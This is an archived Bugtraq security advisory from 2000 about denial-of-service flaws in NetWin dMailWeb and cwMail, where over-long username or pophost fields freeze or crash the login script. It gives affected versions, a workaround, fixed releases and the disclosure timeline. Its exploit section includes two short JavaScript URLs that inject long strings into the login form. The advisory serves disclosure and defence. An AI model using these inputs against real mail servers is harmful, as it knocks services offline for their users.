Bugtraq mailing list archives
NetWin dMailWeb Denial of Service
From: 9cw4 () QLINK QUEENSU CA (Chris Wolfe)
Date: Wed, 21 Jun 2000 11:52:22 -0400
Product: NetWin dMailWeb Type: Denial of Service Severity: Moderate Versions: <= 2.6j: potential buffer overflow in pophost (not fixed) <= 2.6i: pophost DOS (fixed by 2.6j) <= 2.6g: username DOS (fixed by 2.6i) Note: NetWin cwMail is also vulnerable to the same attacks, and appears to be using exactly the same version numbers. --- Overview dMailWeb is a CGI application used to provide web-based e-mail in collaboration with a standard POP server. Authentication is performed by attempting to log into the requested POP server with the supplied username password. An optional feature allows connection to POP server other than the default (or to a limited list of POP servers) - this server can be specified on the login page in the pophost field. Sending long values as the username (>= 240 chars, 239 works normally) will cause the script to freeze (just over a minute on the machines tested). The pophost field has a similar problem, though it requires more characters to trigger (tested 512). An extremely long pophost (tested 1024) causes the script to freeze and then crash. I am not equipped to test for buffer overflow conditions, but suspect one is the cause of the crash. (2.6j removed the delay but still crashes). The DOS was tested using a Perl script from a Linux P200. After approximately 70 requests in 45 seconds the target machine's networking services were completely unavailable. The script is trivial enough that I am not going to tidy it up to publish here. --- Tested target: Linux 2.2.14 (Slackware 7), Pentium 200, 96 Mb RAM Apache 1.3.12, dMail 2.7r (trial). dMailWeb 2.5e, 2.6g, 2.6i, 2.6j (all trial versions) NetWin dMailWeb Demo server. --- Exploit The freezes were tested using simple JavaScript URLs to enter long values in the fields. After running one of the URLs simple enter garbage in the remainder of the fields and press login. - username (>= 240 A's, all one line) javascript:document.loginform.user.value="AA...AA"; alert(document.loginform.user.value); - pophost (tested 512 A's, all one line) javascript:document.loginform.pophost.value="AA...AA"; alert(document.loginform.pophost.value); --- Workaround Use the force_primary ini directive to prevent the pophost field from being processed. Ensure your script user has processor limits set to prevent the entire server being disabled. See: http://www.netwinsite.com/dmailweb/dmailweb.htm --- Solution New versions of dMailWeb (and cwMail) can be downloaded from: ftp://ftp.netwinsite.com/dmailweb/ As of Jun 21 the partially fixed versions are still in Beta testing. They can be downloaded from: ftp://ftp.netwinsite.com/dmailweb/beta/ --- History A notification was sent to NetWin Jun 5, 2000 regarding the username DOS. An update was sent to NetWin Jun 6, 2000 adding the pophost DOS and potential overflow. --- Copyright 2000, Christopher Wolfe. Permission is granted to reproduce this advisory in a complete and unmodified form. This advisory is provided with no warranties of any kind, express or implied. In no event the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this advisory or the information contained therein. Queen's University is in no way related to this message, the information contained therein, on the actions taken in it's gathering - it is simply the e-mail address with which I am subscribed to BugTraq.
Current thread:
- Re: [RHSA-2000:039-02] remote root exploit (SITE EXEC) fixed (fwd), (continued)
- Re: [RHSA-2000:039-02] remote root exploit (SITE EXEC) fixed (fwd) Hugo.van.der.Kooij () CAIW NL (Jun 29)
- CONECTIVA LINUX SECURITY ANNOUNCEMENT - WU-FTPD Security (Jun 23)
- Security Update: wu-ftpd vulnerability Technical Support (Jun 23)
- Re: NAI WebShield SMTP does not scan base64 encoding Andre Albsmeier (Jun 21)
- Bruce 1.0 EA3: Networked Host-Vulnerability Scanner for Solaris & Linux Keith A. Watson (Jun 21)
- NetBSD Security Advisory 2000-007 security-officer () NETBSD ORG (Jun 21)
- Re: NAI WebShield SMTP does not scan base64 encoding Elias Levy (Jun 22)
- Security Bulletins Digest patrick () PINE NL (Jun 22)
- Re: NAI WebShield SMTP does not scan base64 encoding chris.paget () ANALYSYS COM (Jun 22)
- Free mail scanning tool (was Re: NAI WebShield SMTP does not scan base64 encoding) David F. Skoll (Jun 22)
- NetWin dMailWeb Denial of Service Chris Wolfe (Jun 21)
- [RHSA-2000:037-01] New Linux kernel fixes security bug bugzilla () REDHAT COM (Jun 21)